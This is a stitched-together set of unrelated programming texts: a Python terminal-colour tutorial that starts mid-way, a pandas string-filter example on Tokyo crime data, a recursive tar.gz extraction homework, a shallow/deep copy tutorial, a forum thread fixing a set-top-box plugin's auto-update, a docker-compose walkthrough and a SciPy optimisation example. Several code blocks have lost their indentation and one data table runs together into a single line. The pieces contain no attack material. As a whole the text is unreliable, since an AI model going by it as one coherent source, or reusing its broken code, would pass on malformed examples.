bright_magenta = "\033[0;95m"
bright_cyan = "\033[0;96m"
bright_white = "\033[0;97m"
# to use them:
print(red+"Hello")
# you can also have multiple colors:
print(red+"Hel"+bright_blue+"lo")
# and you can even use it with the slowPrint I mentioned earlier!
Output: "Hello" prints in red, then "Hel" in red and "lo" in bright blue.
And you can have underline and italic:
reset = "\u001b[0m"
underline = "\033[4m"
italic = "\033[3m"
# to use it:
print(italic+"Hello "+reset+" there "+underline+"Mister!")
# the reset is for taking away all changes you've made to the text
# it makes the text back to the default color and text decorations.
Output: "Hello" prints in italics, then " there " in the default style, then "Mister!" underlined.
Links: Sources and Good Websites
Sources:
Always good to use a bit of help from here and there!
W3 Schools: https://www.w3schools.com/python/default.asp
Wikipedia: https://en.wikipedia.org/wiki/Guido_van_Rossum
Wikipedia: https://en.wikipedia.org/wiki/ANSI_escape_code
https://www.python-course.eu/python3_functions.php#:~:text=A%20return%20statement%20ends%20the,special%20value%20None%20is%20returned.
Good Websites you can use:
Official website: https://www.python.org/
W3 Schools: https://www.w3schools.com/python/default.asp
https://www.tutorialspoint.com/python/index.htm
https://realpython.com/
Interactive:
Goodbye World!: End
Well, I guess this is the end. I hope y'all have learnt something new/interesting! If you have any questions, please comment and I will try my best to answer them.
Have a super day everyone!
PS: 6 FEET APART!!!
My beautiful ASCII art:
@ChezCoder Ok Imma check it out.
btw, you say you were warned for advertising when you mentioned your projects on a post; was it your post or someone else's post? if it wasn't your post, then yeah I guess that would be advertising.
also popularity on repl.it doesn't really matter, it's mostly how you code ;)
|
When using pandas loc and the like, you can use endswith in the filter condition as follows.
import pandas as pd
df = pd.read_csv('H30.csv', encoding='SHIFT-JIS')
rows = df.loc[df['市区町丁'].str.endswith('計')]
print(rows)
The key part is this:
df['市区町丁'].str.endswith('計')
This selects only the rows whose value in the 市区町丁 (city/ward/town) column ends with the character 計 ("total"). A normal condition would be written like
df['市区町丁'] == '計'
but when you want to use a string method like this, use str.endswith instead.
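The same pattern works for other string methods too; for instance (an illustrative extension, not from the original post), you can invert the mask with ~ to drop the per-ward total rows, or use str.contains for substring matches:
detail_rows = df.loc[~df['市区町丁'].str.endswith('計')]   # everything except the total rows
chiyoda = df.loc[df['市区町丁'].str.contains('千代田')]    # rows mentioning 千代田 anywhere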
By the way, the original CSV data is the number of criminal offences recorded in Tokyo.
市区町丁 総合計 凶悪犯計 凶悪犯強盗 凶悪犯その他
千代田区神田練塀町 17 0 0 0
千代田区神田相生町 13 0 0 0
千代田区計 3204 11 8 3
中央区銀座1丁目 66 1 1 0
Look at the 千代田区計 row: it ends with the character 計.
千代田区計 3204 11 8 3
To find the rows whose 市区町丁 starts with 千代田区 (Chiyoda ward), use startswith.
import pandas as pd
df = pd.read_csv('H30.csv', encoding='SHIFT-JIS')
rows = df.loc[df['市区町丁'].str.startswith('千代田区')]
print(rows)
The result looks like this.
市区町丁 総合計 凶悪犯計 凶悪犯強盗 ... その他占有離脱物横領 その他その他知能犯 その他賭博 その他その他刑法犯0 千代田区丸の内1丁目 639 3 3 ... 6 18 0 311 千代田区丸の内2丁目 53 0 0 ... 1 3 0 62 千代田区丸の内3丁目 68 1 1 ... 1 2 0 63 千代田区大手町1丁目 58 0 0 ... 3 1 0 74 千代田区大手町2丁目 23 0 0 ... 1 0 0 35 千代田区内幸町1丁目 26 1 0 ... 2 0 0 36 千代田区内幸町2丁目 17 0 0 ... 0 0 0 17 千代田区有楽町1丁目 121 0 0 ... 1 0 0 58 千代田区有楽町2丁目 167 0 0 ... 2 1 0 79 千代田区霞が関1丁目 24 0 0 ... 0 2 0 610 千代田区霞が関2丁目 10 0 0 ... 0 0 0 311 千代田区霞が関3丁目 7 0 0 ... 1 1 0 012 千代田区永田町1丁目 21 0 0 ... 0 0 0 813 千代田区永田町2丁目 26 0 0 ... 0 0 0 414 千代田区隼町 1 0 0 ... 0 0 0 115 千代田区平河町1丁目 10 0 0 ... 0 0 0 016 千代田区平河町2丁目 8 0 0 ... 0 1 0 017 千代田区麹町1丁目 18 1 0 ... 1 0 0 318 千代田区麹町2丁目 3 0 0 ... 0 0 0 219 千代田区麹町3丁目 6 0 0 ... 0 0 0 220 千代田区麹町4丁目 14 0 0 ... 1 0 0 121 千代田区麹町5丁目 4 1 1 ... 0 0 0 122 千代田区麹町6丁目 10 0 0 ... 0 1 0 223 千代田区紀尾井町 28 0 0 ... 0 0 0 124 千代田区一番町 8 0 0 ... 0 0 0 225 千代田区二番町 6 0 0 ... 1 0 0 126 千代田区三番町 9 0 0 ... 0 0 0 127 千代田区四番町 3 0 0 ... 0 0 0 028 千代田区五番町 20 0 0 ... 2 0 0 129 千代田区六番町 13 0 0 ... 1 1 0 3.. ... ... ... ... ... ... ... ... ...83 千代田区外神田5丁目 9 0 0 ... 1 0 0 084 千代田区外神田6丁目 23 0 0 ... 1 0 0 185 千代田区鍛冶町1丁目 23 0 0 ... 1 0 0 386 千代田区鍛冶町2丁目 84 0 0 ... 5 0 0 687 千代田区神田鍛冶町3丁目 16 0 0 ... 0 0 0 088 千代田区神田紺屋町 6 0 0 ... 0 0 0 189 千代田区神田北乗物町 1 0 0 ... 0 0 0 190 千代田区神田富山町 4 0 0 ... 0 0 0 291 千代田区神田美倉町 2 0 0 ... 0 0 0 092 千代田区岩本町1丁目 6 0 0 ... 0 0 0 293 千代田区岩本町2丁目 19 0 0 ... 1 0 0 294 千代田区岩本町3丁目 15 0 0 ... 2 1 0 095 千代田区神田西福田町 2 0 0 ... 0 0 0 196 千代田区神田東松下町 2 0 0 ... 0 0 0 097 千代田区神田岩本町 13 0 0 ... 3 0 0 098 千代田区東神田1丁目 16 0 0 ... 2 0 0 199 千代田区東神田2丁目 15 0 0 ... 1 0 0 3100 千代田区東神田3丁目 2 0 0 ... 0 0 0 0101 千代田区神田和泉町 9 0 0 ... 1 0 0 0102 千代田区神田佐久間町1丁目 71 0 0 ... 3 0 0 6103 千代田区神田佐久間町2丁目 11 0 0 ... 1 0 0 1104 千代田区神田佐久間町3丁目 16 1 1 ... 0 0 0 1105 千代田区神田佐久間町4丁目 3 0 0 ... 0 0 0 1106 千代田区神田平河町 4 0 0 ... 1 0 0 0107 千代田区神田松永町 17 0 0 ... 2 0 0 5108 千代田区神田花岡町 42 0 0 ... 2 0 0 2109 千代田区神田佐久間河岸 2 0 0 ... 0 0 0 0110 千代田区神田練塀町 17 0 0 ... 2 2 0 2111 千代田区神田相生町 13 0 0 ... 0 0 0 1112 千代田区計 3204 11 8 ... 105 50 0 298
|
Background
The task is to recursively extract an archive and sum up the numbers stored inside it. It comes from the University of Chinese Academy of Sciences, Introduction to Algorithms, homework 02 (source file).
Exercise (2).
A file xx.tar.gz is defined to be generated as follows: either a file named xx is packed and compressed with tar and gzip, and that file records a single non-negative integer as a string; or a directory named xx is packed and compressed with tar and gzip, and that directory contains several xx.tar.gz archives. Here x ∈ [0, 9].
Given a file 00.tar.gz generated according to the definition above (downloadable from the course website), determine how many files named xx it contains and the sum of the non-negative integers recorded in those files.
> 00.tar.gz download link: https://download.csdn.net/download/still_night/10820211
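If you cannot get the original 00.tar.gz, you can build a tiny archive with the same nested structure yourself to try the code below (a minimal sketch; the file names 00 and 11 and the number 42 are just example values):
import os
import tarfile

os.makedirs("00", exist_ok=True)
with open("11", "w") as fp:          # innermost data file holding a non-negative integer
    fp.write("42")
with tarfile.open("00/11.tar.gz", "w:gz") as tar:
    tar.add("11")                    # 11.tar.gz wraps the data file
with tarfile.open("00.tar.gz", "w:gz") as tar:
    tar.add("00")                    # 00.tar.gz wraps the directory containing 11.tar.gz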
Implementation (Python)
import os, tarfile

def unpack_path_file(pathname):
    archive = tarfile.open(pathname, 'r:gz')
    path = os.path.split(os.path.abspath(pathname))[0]
    f, n = 0, 0  # file count and running sum both start at 0
    for tarinfo in archive:
        archive.extract(tarinfo, path)  # extract one member of the archive
        tfname = os.path.join(path, tarinfo.name)  # path of the extracted member on disk
        if tarinfo.isfile():  # only handle regular files (a member may also be ".", i.e. the archive root)
            if tarinfo.name.rfind(".tar.gz") != -1:  # the member is itself an archive, so recurse into it
                f1, n1 = unpack_path_file(tfname)
                f += f1
                n += n1
                # add the file count and sum reported by the recursive call
            else:  # otherwise it is a data file containing a non-negative integer
                f += 1  # one more data file found
                with open(tfname) as fp:  # read the integer and add it to the running sum
                    n += int(fp.read())
    archive.close()  # close this archive
    return f, n  # report the file count and the sum to the caller

# start the extraction from the outermost archive
files, total = unpack_path_file("00.tar.gz")
print("Number of files:", files)
print("Sum:", total)
Result
Number of files: 3170
Sum: 15752491
|
Shallow vs Deep Copying of Python Objects
Assignment statements in Python (https://realpython.com/python-variables/#variable-assignment) do not create copies of objects; they only bind a name to an object. For immutable objects, that usually doesn't make a difference.
But for working with mutable objects or collections of mutable objects, you might be looking for a way to create "real copies" or "clones" of these objects.
Essentially, you'll sometimes want copies that you can modify without automatically modifying the original at the same time. In this article I'm going to give you the rundown on how to copy or "clone" objects in Python 3, and some of the caveats involved.
Note: This tutorial was written with Python 3 in mind, but there is little difference between Python 2 and 3 when it comes to copying objects. When there are differences, I'll point them out in the text.
Let's start by looking at how to copy Python's built-in collections. Python's built-in mutable collections like lists, dicts, and sets can be copied by calling their factory functions on an existing collection:
new_list = list(original_list)
new_dict = dict(original_dict)
new_set = set(original_set)
However, this method won't work for custom objects and, on top of that, it only creates shallow copies. For compound objects like lists, dicts, and sets, there's an important difference between shallow and deep copying:
A shallow copy means constructing a new collection object and then populating it with references to the child objects found in the original. In essence, a shallow copy is only one level deep. The copying process does not recurse and therefore won't create copies of the child objects themselves.
A deep copy makes the copying process recursive. It means first constructing a new collection object and then recursively populating it with copies of the child objects found in the original. Copying an object this way walks the whole object tree to create a fully independent clone of the original object and all of its children.
That was a bit of a mouthful. Let's look at some examples to illustrate the difference between deep and shallow copies.
Making Shallow Copies
In the example below, we'll create a new nested list and then shallowly copy it with the list() factory function:
>>>
>>> xs = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
>>> ys = list(xs)  # Make a shallow copy
This means ys will be a new and independent object with the same contents as xs. To verify this, let's inspect both objects:
>>>
>>> xs
[[1, 2, 3], [4, 5, 6], [7, 8, 9]]
>>> ys
[[1, 2, 3], [4, 5, 6], [7, 8, 9]]
To confirm ys really is independent from the original, let's devise a little experiment. You could try and add a new sublist to the original (xs) and then check to make sure this modification didn't affect the copy (ys):
>>>
>>> xs.append(['new sublist'])
>>> xs
[[1, 2, 3], [4, 5, 6], [7, 8, 9], ['new sublist']]
>>> ys
[[1, 2, 3], [4, 5, 6], [7, 8, 9]]
As you can see, this had the expected effect. Modifying the copied list at a "superficial" level was no problem at all.
However, because we only created a shallow copy of the original list, ys still contains references to the original child objects stored in xs.
These children were not copied. They were merely referenced again in the copied list.
Therefore, when you modify one of the child objects in xs, this modification will be reflected in ys as well - that's because both lists share the same child objects. The copy is only a shallow, one level deep copy.
>>>
>>> xs[1][0] = 'X'
>>> xs
[[1, 2, 3], ['X', 5, 6], [7, 8, 9], ['new sublist']]
>>> ys
[[1, 2, 3], ['X', 5, 6], [7, 8, 9]]
In the above example we (seemingly) only made a change to xs. But it turns out both sublists at index 1 in xs and ys were modified. Again, this happened because we had only created a shallow copy of the original list.
Had we created a deep copy of xs in the first step, both objects would've been fully independent. This is the practical difference between shallow and deep copies of objects.
Now you know how to create shallow copies of some of the built-in collection classes, and you know the difference between shallow and deep copying. The questions we still want answers for are:
How can you create deep copies of built-in collections?
How can you create copies (shallow and deep) of arbitrary objects, including custom classes?
The answer to these questions lies in the copy module in the Python standard library. This module provides a simple interface for creating shallow and deep copies of arbitrary Python objects.
Making Deep Copies
Let's repeat the previous list-copying example, but with one important difference. This time we're going to create a deep copy using the deepcopy() function defined in the copy module instead:
>>>
>>> import copy
>>> xs = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
>>> zs = copy.deepcopy(xs)
When you inspect xs and its clone zs that we created with copy.deepcopy(), you'll see that they both look identical again - just like in the previous example:
>>>
>>> xs
[[1, 2, 3], [4, 5, 6], [7, 8, 9]]
>>> zs
[[1, 2, 3], [4, 5, 6], [7, 8, 9]]
However, if you make a modification to one of the child objects in the original object (xs), you'll see that this modification won't affect the deep copy (zs).
Both objects, the original and the copy, are fully independent this time. xs was cloned recursively, including all of its child objects:
>>>
>>> xs[1][0] = 'X'
>>> xs
[[1, 2, 3], ['X', 5, 6], [7, 8, 9]]
>>> zs
[[1, 2, 3], [4, 5, 6], [7, 8, 9]]
You might want to take some time to sit down with the Python interpreter and play through these examples right about now. Wrapping your head around copying objects is easier when you get to experience and play with the examples firsthand.
By the way, you can also create shallow copies using a function in the copy module. The copy.copy() function creates shallow copies of objects.
This is useful if you need to clearly communicate that you're creating a shallow copy somewhere in your code. Using copy.copy() lets you indicate this fact. However, for built-in collections it's considered more Pythonic to simply use the list, dict, and set factory functions to create shallow copies.
Copying Arbitrary Python Objects
The question we still need to answer is how do we create copies (shallow and deep) of arbitrary objects, including custom classes. Let's take a look at that now.
Again the copy module comes to our rescue. Its copy.copy() and copy.deepcopy() functions can be used to duplicate any object.
Once again, the best way to understand how to use these is with a simple experiment. I'm going to base this on the previous list-copying example. Let's start by defining a simple 2D point class:
class Point:
def __init__(self, x, y):
self.x = x
self.y = y
def __repr__(self):
return f'Point({self.x!r}, {self.y!r})'
I hope you agree that this was pretty straightforward. I added a __repr__() implementation so that we can easily inspect objects created from this class in the Python interpreter.
Note: The above example uses a Python 3.6 f-string (https://dbader.org/blog/python-string-formatting) to construct the string returned by __repr__. On Python 2 and versions of Python 3 before 3.6 you'd use a different string formatting expression, for example:
def __repr__(self):
return 'Point(%r, %r)' % (self.x, self.y)
Next up, we're going to create a Point instance and then (shallowly) copy it, using the copy module:
>>>
>>> a = Point(23, 42)
>>> b = copy.copy(a)
If we inspect the contents of the original Point object and its (shallow) clone, we see what we'd expect:
>>>
>>> a
Point(23, 42)
>>> b
Point(23, 42)
>>> a is b
False
Here's something else to keep in mind. Because our point object uses immutable types (ints) for its coordinates, there's no difference between a shallow and a deep copy in this case. But I'll expand the example in a second.
Let's move on to a more complex example. I'm going to define another class to represent 2D rectangles. I'll do it in a way that lets us create a more complex object hierarchy - my rectangles will use Point objects to represent their coordinates:
class Rectangle:
def __init__(self, topleft, bottomright):
self.topleft = topleft
self.bottomright = bottomright
def __repr__(self):
return (f'Rectangle({self.topleft!r}, '
f'{self.bottomright!r})')
Again, first we're going to attempt to create a shallow copy of a rectangle instance:
rect = Rectangle(Point(0, 1), Point(5, 6))
srect = copy.copy(rect)
If you inspect the original rectangle and its copy, you'll see how nicely the __repr__() override works, and that the shallow copy process worked as expected:
>>>
>>> rect
Rectangle(Point(0, 1), Point(5, 6))
>>> srect
Rectangle(Point(0, 1), Point(5, 6))
>>> rect is srect
False
Remember how the previous list example illustrated the difference between deep and shallow copies? I'm going to use the same approach here. I'll modify an object deeper in the object hierarchy, and then you'll see this change reflected in the (shallow) copy as well:
>>>
>>> rect.topleft.x = 999
>>> rect
Rectangle(Point(999, 1), Point(5, 6))
>>> srect
Rectangle(Point(999, 1), Point(5, 6))
I hope this behaved the way you expected it to. Next, I'm going to create a deep copy of the original rectangle. Then I'll apply another modification and you'll see which objects are affected:
>>>
>>> drect = copy.deepcopy(srect)
>>> drect.topleft.x = 222
>>> drect
Rectangle(Point(222, 1), Point(5, 6))
>>> rect
Rectangle(Point(999, 1), Point(5, 6))
>>> srect
Rectangle(Point(999, 1), Point(5, 6))
Voila! This time the deep copy (drect) is fully independent of the original (rect) and the shallow copy (srect).
We've covered a lot of ground here, and there are still some finer points to copying objects.
It pays to go deep (ha!) on this topic, so you may want to study up on the copy module documentation (https://docs.python.org/3/library/copy.html). For example, objects can control how they're copied by defining the special methods __copy__() and __deepcopy__() on them.
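As a rough illustration of that protocol (a minimal sketch with a made-up Prototype class, not code from this article), a class can return whatever it considers a sensible copy from those two hooks:
import copy

class Prototype:
    def __init__(self, payload):
        self.payload = payload

    def __copy__(self):
        # Called by copy.copy(): decide here what a shallow copy should mean
        return Prototype(self.payload)

    def __deepcopy__(self, memo):
        # Called by copy.deepcopy(); the memo dict guards against cycles
        return Prototype(copy.deepcopy(self.payload, memo))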
3 Things to Remember
Making a shallow copy of an object won't clone child objects. Therefore, the copy is not fully independent of the original.
A deep copy of an object will recursively clone child objects. The clone is fully independent of the original, but creating a deep copy is slower.
You can copy arbitrary objects (including custom classes) with the copy module.
|
Just checked it in on github
Perfect, great, thanks.
I'll try it out right away.
First of all, a big compliment to the programmers! Outstanding effort and a great result!!
Now I'd be curious how the proxy is doing. Does it have a lot to do, or is it handling everything easily so far?
Regards, rdanton.
Good evening everyone,
from my side as well, a very big compliment to the programmers and for the effort put into the "cooperation" with wunschliste.de. On my 8K (with the Merlin image and Zombi skin) the update to version 3.2 worked flawlessly. On my 7080 (with the Merlin image and skin), however, the update hangs at "Starting update, please wait..." and only the main power switch on the back helps. Could that be related to the skin? I.e. is the Merlin skin no longer suitable for the new SR version? With the previous version everything worked with this skin.
Could you please also explain again exactly how donating works?
Regards,
Boxxxfan
So far I've always had to update the dm7080 by hand.
Since SR isn't skinned in the merlin4 skin, the skin has no influence here.
I have no problems on the 7080 here, with the merlin4 skin.
True, it's actually the first update since I installed the plugin on the 7080. Well then, I'll just update it "manually". Can the new version simply be installed over the old one?
Follow the link to the beta in the first post, unpack the zip and overwrite the files on the box.
Restart > done
There aren't particularly many DM7080HD (or, more correctly, DreamOS) users - at the moment I think it's 70 downloads - but maybe someone who knows their way around can take a look at what goes wrong with the auto-update. Unfortunately I don't have a suitable box to test and debug this (there are no problems with the IPKs). Otherwise it might be better to disable the auto-update function for the DEBs and show a notice instead that a new version is available. It's not great if the box hangs and can only be revived via the power switch.
If you tell me where to start in order to debug this, I'd be happy to give it a try.
So just tell me which .py the auto-update lives in and in which lines, then I'll add some debug output and try to figure it out...
By the way, the power switch isn't necessary - a systemctl stop enigma2 followed by systemctl start enigma2 via telnet does the job too...
Thanks a lot for your offer - I'm happy to support you with that.
Since version 3.2 the whole auto-update code has moved into a separate module, "SerienRecorderUpdateScreen.py".
If I understood correctly, the download from github into the /tmp folder of the box works (someone wrote that in the old SR thread) - but maybe that should be checked again, to make sure the DEB isn't incomplete - or something like that.
The installation happens in line 201 - maybe the command simply isn't right or something is still missing. I had already changed the order once, but that change only takes effect when someone updates from 3.2 to a newer version - and that hasn't happened yet. Maybe the problem has already been solved by that.
Is einfall reading along here? I sent him a PM so that he can send me his Amazon wishlist link.
No reply so far.
I just set up SR on my 7020HD and used the Config.backup from my 7080. There I had set /data/log/ as the log file path.
On the 7020HD that directory was missing, and I got a green screen. Can that be caught?
Crash log attached.
The command in line 201 looks good. If self.filename is /tmp/sr.deb, that should actually work. The order is correct this way: first update, then install, then resolve dependencies.
Yes, I just found that myself. I'm currently adding debug output at all the necessary places and will see where it gets stuck.
OK, I found it: not only the eTimer was changed in DreamOS, but also the eAppContainer. This is what your line looks like:
Code
self.container.appClosed.append(self.finishedPluginUpdate)
self.container.stdoutAvail.append(self.srlog)
if isDreamboxOS:
self.container.execute("apt-get update && dpkg -i %s && apt-get -f install" % str(self.file_name))
else:
self.container.execute("opkg install --force-overwrite --force-depends --force-downgrade %s" % str(self.file_name))
and in DreamOS, self.container.appClosed.append(self.finishedPluginUpdate)
becomes the line self.appClosed_conn = self.container.appClosed.connect(self.finishedPluginUpdate)
That means, with a bit of debug code on my part, it then looks like this:
Code
if isDreamboxOS:
self.appClosed_conn = self.container.appClosed.connect(self.finishedPluginUpdate)
strCommand = "apt-get update && dpkg -i %s && apt-get -f install" % str(self.file_name)
print("[SerienRecoder] running update command ", strCommand)
self.container.execute(strCommand)
else:
self.container.appClosed.append(self.finishedPluginUpdate)
self.container.stdoutAvail.append(self.srlog)
strCommand = "opkg install --force-overwrite --force-depends --force-downgrade %s" % str(self.file_name)
print("[SerienRecoder] running update command ", strCommand)
self.container.execute(strCommand)
The minimal change would simply be to pull that one line into the if:
Code
self.container.stdoutAvail.append(self.srlog)
if isDreamboxOS:
self.appClosed_conn = self.container.appClosed.connect(self.finishedPluginUpdate)
self.container.execute("apt-get update && dpkg -i %s && apt-get -f install" % str(self.file_name))
else:
self.container.appClosed.append(self.finishedPluginUpdate)
self.container.execute("opkg install --force-overwrite --force-depends --force-downgrade %s" % str(self.file_name))
With this change the update also runs cleanly under DreamOS.
Hello,
how does it work in the new version if you want to search for new series via text?
In the menu, yellow and then blue no longer works.
Regards
zp
As it also says on the linked download page under "Changes": press button 1
Hello
OK thanks, I hadn't seen that. It works.
Regards
|
0x00 About docker compose
You can think of docker-compose as a wrapper around the docker command. It is a tool for automating docker: docker-compose can manage several containers at once, and it is typically used when multiple containers need to cooperate to get a job done.
0x01 Installation and removal
0x02 Some common commands
Build and start the containers: docker-compose up -d
Start containers: docker-compose start
Stop containers: docker-compose stop
Restart containers: docker-compose restart
Kill containers: docker-compose kill
Remove containers: docker-compose rm
Open a bash shell in a container: docker-compose exec [services_name] bash
Run a single command: docker-compose run [services_name] [command]
0x03 A simple docker-compose application
Structure
.
├── Dockerfile
├── docker-compose.yml
└── src
├── app.py
└── sources.list
1 directory, 4 files
Dockerfile
FROM ubuntu:14.04.4
MAINTAINER reber <1070018473@qq.com>
COPY ./src /code # copy ./src into /code inside the image
WORKDIR /code
RUN cp sources.list /etc/apt/sources.list && apt-get update
RUN apt-get install -y python-dev python-pip
RUN pip install flask redis
CMD ["python","app.py"]
docker-compose.yml (defines two services)
version: '3'
services:
  web:
    image: "dockercompose:test"  # image name and tag
    build: .
    ports:
      - "8888:5000"              # map container port 5000 to host port 8888
    volumes:
      - ./src:/code              # after mounting, changes to local files show up in the container and vice versa
    links:
      - redis                    # with links, the web service can reach redis by the name "redis" instead of an IP, e.g. ping -c 2 redis
  redis:
    image: "redis:alpine"
    ports:
      - "3333:6379"
app.py
import time
import redis
from flask import Flask
app = Flask(__name__)
cache = redis.Redis(host='redis', port=6379)
def get_hit_count():
retries = 5
while True:
try:
return cache.incr('hits')
except redis.exceptions.ConnectionError as exc:
if retries == 0:
raise exc
retries -= 1
time.sleep(0.5)
@app.route('/')
def hello():
count = get_hit_count()
return 'Hello World! I have been seen {} times.\n'.format(count)
if __name__ == "__main__":
app.run(host="0.0.0.0", debug=True)
Working with the containers
[12:21 reber@wyb in ~/dockercomposetest]
#build and run the containers
➜ docker-compose up -d
Creating dockercomposetest_redis_1 ...
Creating dockercomposetest_redis_1 ... done
Creating dockercomposetest_web_1 ...
Creating dockercomposetest_web_1 ... done
#two images, ubuntu and redis, were pulled, and the image dockercompose:test was built on top of them
➜ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
dockercompose test c421a84a85a9 About an hour ago 415MB
redis alpine 05635ee9e1c7 6 days ago 40.8MB
ubuntu 14.04.4 0ccb13bf1954 2 years ago 188MB
#two containers were created
➜ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
b1a5d90b0646 dockercompose:test "python app.py" 36 seconds ago Up 35 seconds 0.0.0.0:8888->5000/tcp dockercomposetest_web_1
364d6cf7ae50 redis:alpine "docker-entrypoint..." 36 seconds ago Up 35 seconds 0.0.0.0:3333->6379/tcp dockercomposetest_redis_1
#each command run with docker-compose run creates a new container
➜ docker-compose run web pwd
Starting dockercomposetest_redis_1 ... done
/code
➜ docker-compose run web ls
Starting dockercomposetest_redis_1 ... done
app.py sources.list
➜ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
9b74c86f8f99 dockercompose:test "ls" 15 seconds ago Exited (0) 10 seconds ago dockercomposetest_web_run_2
6025c6379617 dockercompose:test "pwd" 20 seconds ago Exited (0) 19 seconds ago dockercomposetest_web_run_1
b1a5d90b0646 dockercompose:test "python app.py" 9 minutes ago Up 9 minutes 0.0.0.0:8888->5000/tcp dockercomposetest_web_1
364d6cf7ae50 redis:alpine "docker-entrypoint..." 9 minutes ago Up 9 minutes 0.0.0.0:3333->6379/tcp dockercomposetest_redis_1
#check that it is running
➜ curl http://127.0.0.1:8888
Hello World! I have been seen 3 times.
➜ redis-cli -h 127.0.0.1 -p 3333
127.0.0.1:3333> keys *
1) "hits"
127.0.0.1:3333> get hits
"3"
127.0.0.1:3333> exit
Common commands
[12:31 reber@wyb in ~/dockercomposetest]
➜ docker-compose up -d
Creating dockercomposetest_redis_1 ...
Creating dockercomposetest_redis_1 ... done
Creating dockercomposetest_web_1 ...
Creating dockercomposetest_web_1 ... done
➜ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
d8b6270f1b63 dockercompose:test "python app.py" 7 seconds ago Up 6 seconds 0.0.0.0:8888->5000/tcp dockercomposetest_web_1
4d1965d53fe5 redis:alpine "docker-entrypoint..." 7 seconds ago Up 6 seconds 0.0.0.0:3333->6379/tcp dockercomposetest_redis_1
➜ docker-compose stop
Stopping dockercomposetest_web_1 ... done
Stopping dockercomposetest_redis_1 ... done
[12:31 reber@wyb in ~/dockercomposetest]
➜ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
0582adca2a2d dockercompose:test "python app.py" 12 seconds ago Exited (0) 7 seconds ago dockercomposetest_web_1
1f8417160da3 redis:alpine "docker-entrypoint..." 12 seconds ago Exited (0) 6 seconds ago dockercomposetest_redis_1
➜ docker-compose rm
Going to remove dockercomposetest_web_1, dockercomposetest_redis_1
Are you sure? [yN] y
Removing dockercomposetest_web_1 ... done
Removing dockercomposetest_redis_1 ... done
➜ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
0x04 Building a Tomcat instance
➜ tree
.
├── Dockerfile
├── docker-compose.yml
├── src
│ ├── apache-tomcat-8.0.53.tar.gz
│ ├── jdk-8u181-linux-x64.tar.gz
│ └── sources.list
└── web
└── index.jsp
2 directories, 6 files
➜ cat Dockerfile
FROM ubuntu:14.04.4
MAINTAINER reber <1070018473@qq.com>
COPY ./src /data
WORKDIR /data
RUN cp sources.list /etc/apt/sources.list && apt-get update
RUN tar -zxvf apache-tomcat-8.0.53.tar.gz && mv apache-tomcat-8.0.53 /opt
RUN tar -zxvf jdk-8u181-linux-x64.tar.gz && mv jdk1.8.0_181 /opt
RUN rm -rf /data
ENV JAVA_HOME="/opt/jdk1.8.0_181"
ENV JAVA_BIN="$JAVA_HOME/bin"
ENV CLASSPATH="$JAVA_HOME/lib"
ENV PATH="$JAVA_HOME/bin":$PATH
WORKDIR /opt/apache-tomcat-8.0.53/webapps/ROOT
ENTRYPOINT ["tail","-f","/dev/null"] #使容器一直运行,不自动退出
➜ cat docker-compose.yml
version: '3'
services:
tomcat:
image: ubuntu:tomcat
build: .
ports:
- "8888:8080"
volumes:
- ./web:/opt/apache-tomcat-8.0.53/webapps/ROOT
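Following the same pattern as the earlier example, one way to build and check this instance might be the sketch below — note that the Dockerfile's ENTRYPOINT only keeps the container alive, so Tomcat itself still has to be started inside it:
➜ docker-compose up -d --build
➜ docker-compose exec tomcat /opt/apache-tomcat-8.0.53/bin/startup.sh
➜ curl http://127.0.0.1:8888/index.jsp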
|
The AnyBody Modeling System (AMS) provides a built-in optimization class, AnyOptStudy, which lets you solve advanced mathematical optimization problems.
See also: You can get a taste of how it works in the newly updated tutorial on parameter and optimization studies
Extending the optimization
Of course, there can be situations where you want to do a little more than what the AMS optimization offers. Say you have two separate models and want to optimize some parameter across the performance of both models, or perhaps you want to use a specific algorithm suited to your exact problem. To solve these kinds of problems, you could drive the optimization process from third-party software.
In this post we will demonstrate how these problems can be solved using Python. This topic is part of a new AnyBody tutorial which describes the content of this post in detail.
As part of the post we will show how to integrate the SciPy optimization function scipy.optimize.minimize by running the AnyBody 2D bike model from Python, using the AnyPyTools package.
Fig. 1: The 2D bike model used in this example and the new tutorial.
Optimization example
The process of performing optimization of AMS models through Python can be sketched in four steps:
Defining a function that calls the model using AnyPyTools and applies the design variables
Defining an objective function to be either minimized or maximized
Defining the constraints and bounds of the problem
Running the optimization
And the whole Python code to complete these four steps could look like this:
import math
import scipy.integrate
import scipy.optimize
from anypytools import AnyPyProcess
from anypytools.macro_commands import Load, OperationRun, Dump, SetValue
def run_model(saddle_height, saddle_pos, silent=False):
"""Run the AnyBody model and return the metabolism results"""
macro = [
Load("BikeModel2D.main.any"),
SetValue("Main.BikeParameters.SaddleHeight", saddle_height),
SetValue("Main.BikeParameters.SaddlePos", saddle_pos),
OperationRun("Main.Study.InverseDynamics"),
Dump("Main.Study.Output.Pmet"),
Dump("Main.Study.Output.Abscissa.t"),
]
app = AnyPyProcess(silent=silent)
results = app.start_macro(macro)
return results[0]
def objfun(designvars):
"""Calculate the objective function value"""
saddle_height = designvars[0]
saddle_pos = designvars[1]
result = run_model(saddle_height, saddle_pos, silent=True)
if "ERROR" in result:
raise ValueError("Failed to run model")
pmet = scipy.integrate.trapz(result["Pmet"], result["Abscissa.t"])
return float(pmet)
def seat_distance_constraint(designvars):
"""Compute contraint value which must be larger than zero"""
return math.sqrt(designvars[0] ** 2 + designvars[1] ** 2) - 0.66
constraints = {"type": "ineq", "fun": seat_distance_constraint}
bounds = [(0.61, 0.69), (-0.22, -0.05)]
initial_guess = (0.68, -0.15)
solution = scipy.optimize.minimize(
objfun, initial_guess, constraints=constraints, bounds=bounds, method="SLSQP"
)
print(solution)
Breaking down the sections
To elaborate a little on the sections: the first part defines the run_model function. This function takes two arguments and assigns them to the saddle height and saddle position in the AMS model. The function returns the Pmet value for each time step in the model.
Details and advanced options of this function and its components can be found in the AnyPyTools documentation.
The second part defines the objective function. It takes a list of design variables, runs the model via run_model, then integrates Pmet over the whole time series and returns the result.
